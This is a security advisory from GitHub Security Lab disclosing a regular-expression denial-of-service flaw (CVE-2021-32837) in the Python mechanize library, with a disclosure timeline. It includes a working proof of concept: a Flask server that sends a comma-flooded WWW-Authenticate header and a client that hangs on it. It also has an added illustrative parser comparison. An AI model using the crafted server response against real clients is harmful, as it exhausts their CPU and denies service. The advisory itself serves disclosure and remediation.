Coordinated Disclosure Timeline
- 2021-08-31: Created issue asking for contact details.
- 2021-08-31: They added a security policy and closed the issue. I sent the report to kovid@kovidgoyal.net
- 2021-08-31: Issue is fixed by @kovidgoyal.
- 2021-08-31: Emailed kovid@kovidgoyal.net to ask if there will be a new release of mechanize and whether there will be an advisory.
- 2021-09-01: Reply from kovid@kovidgoyal.net: “New version released”
Summary
mechanize contains a regular expression that is vulnerable to ReDoS (Regular Expression Denial of Service).
Product
mechanize
Tested Version
Details
ReDoS
ReDoS, or Regular Expression Denial of Service, is a vulnerability affecting inefficient regular expressions: a pattern with nested or overlapping quantifiers can make a backtracking engine take time that grows superlinearly (often exponentially) in the length of a crafted input string, so a single response can tie up the CPU for a very long time.
This vulnerability was found using a CodeQL query which identifies inefficient regular expressions. You can see the query on mechanize here.
Vulnerability
The vulnerable regular expression is here.
mechanize is a library for automatically interacting with HTTP web servers. If the web server responds in a malicious way, mechanize can spend effectively unbounded CPU time evaluating the regular expression on the response and hang, denying service to the client.
The reproduction steps below first start a web server, and then start mechanize. You can try to delete the resp.headers[... line to see how mechanize should behave.
- Install mechanize and flask:
pip3 install mechanize flask
- Run the server below with python3:
from flask import Flask, make_response

app = Flask(__name__)

@app.route("/")
def home():
    # Answer every request with a 401 that carries a crafted
    # WWW-Authenticate header: a long run of commas is the input the
    # vulnerable regular expression backtracks on.
    resp = make_response("401 Unauthorized")
    resp.status_code = 401
    resp.headers["www-authenticate"] = ",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"
    return resp

if __name__ == "__main__":
    app.run(debug=True, port=8080)
- Leave the above server running while doing the next steps.
- Run the below with python3:
import mechanize

br = mechanize.Browser()
# Registering credentials makes mechanize handle the 401 challenge,
# which is where the WWW-Authenticate header gets parsed.
br.add_password("http://localhost:8080", "admin", "password")
# With the crafted header this call does not return in any reasonable time.
br.open("http://localhost:8080")
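To see why a header consisting only of commas is the right trigger, the added example below (my own code, not from mechanize or this advisory) puts a challenge-parsing regular expression of the nested-quantifier shape next to a linear-time parser for the same job and times both on the comma-heavy value the Flask server above sends. The pattern is an assumed, representative one (a `(?:.*,)*` prefix followed by `<scheme> realm=...`, the shape basic-auth challenge parsers in this code lineage have used); the advisory links to mechanize's actual expression rather than reproducing it, so the pattern here is not claimed to be identical. The constructed inputs are labelled in the code.

```python
"""Added example, not code from mechanize or from this advisory.

ASSUMPTION: VULNERABLE_RX is a representative challenge-parsing pattern with
the nested-quantifier shape that causes ReDoS; it is not copied from mechanize.
"""
import re
import time

# Vulnerable shape: ``(?:.*,)*`` lets the engine split a run of commas into
# exponentially many "segments", and every split is retried once ``realm=``
# turns out to be absent.  ASSUMED representative pattern, see docstring.
VULNERABLE_RX = re.compile(
    r'(?:.*,)*[ \t]*([^ \t]+)[ \t]+realm=(["\']?)([^"\']*)\2', re.I
)


def parse_challenge_vulnerable(header):
    """Return (scheme, realm) using the backtracking-prone pattern, or None."""
    m = VULNERABLE_RX.search(header)
    if m is None:
        return None
    return m.group(1), m.group(3)


def parse_challenge_linear(header):
    """Same extraction without nested quantifiers.

    Split on commas exactly once, then inspect each piece with plain string
    operations, so the work is proportional to len(header) for any input.
    """
    for chunk in header.split(','):
        parts = chunk.strip().split(None, 1)  # scheme, then the rest
        if len(parts) != 2:
            continue
        scheme, rest = parts
        if not rest.lower().startswith('realm='):
            continue
        realm = rest[len('realm='):].strip()
        # Drop a matching pair of surrounding quotes, as the regex's \2 does.
        if len(realm) >= 2 and realm[0] == realm[-1] and realm[0] in '"\'':
            realm = realm[1:-1]
        return scheme, realm
    return None


def hostile_header(n_commas):
    """Constructed input: the kind of value the Flask server above returns."""
    return ',' * n_commas


def time_parser(parser, header):
    """Seconds spent by ``parser`` on ``header`` (wall clock)."""
    start = time.perf_counter()
    parser(header)
    return time.perf_counter() - start


if __name__ == '__main__':
    # Constructed benign challenge: both parsers agree on it.
    benign = 'Basic realm="restricted area", charset="UTF-8"'
    print(parse_challenge_vulnerable(benign), parse_challenge_linear(benign))
    # Hostile input: the vulnerable pattern's cost roughly doubles with each
    # extra comma while the linear parser stays flat.  n is kept small so the
    # demonstration finishes; the 41-comma header from the server would not.
    for n in (8, 12, 16):
        h = hostile_header(n)
        print('%2d commas: vulnerable %.4fs, linear %.6fs' % (
            n,
            time_parser(parse_challenge_vulnerable, h),
            time_parser(parse_challenge_linear, h)))
```

The linear parser is not presented as mechanize's fix; it shows the property a fix needs: no quantified group that can re-match the same text in more than one way, so the engine never has to enumerate partitions of the input when a match fails.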
Impact
A malicious or compromised web server can make a mechanize client consume excessive CPU time while parsing its response, which may lead to a denial of service.
CVE
- CVE-2021-32837
Credit
This issue was discovered by GitHub team members @erik-krogh (Erik Krogh Kristensen) and @yoff (Rasmus Petersen).
Contact
You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-108 in any communication regarding this issue.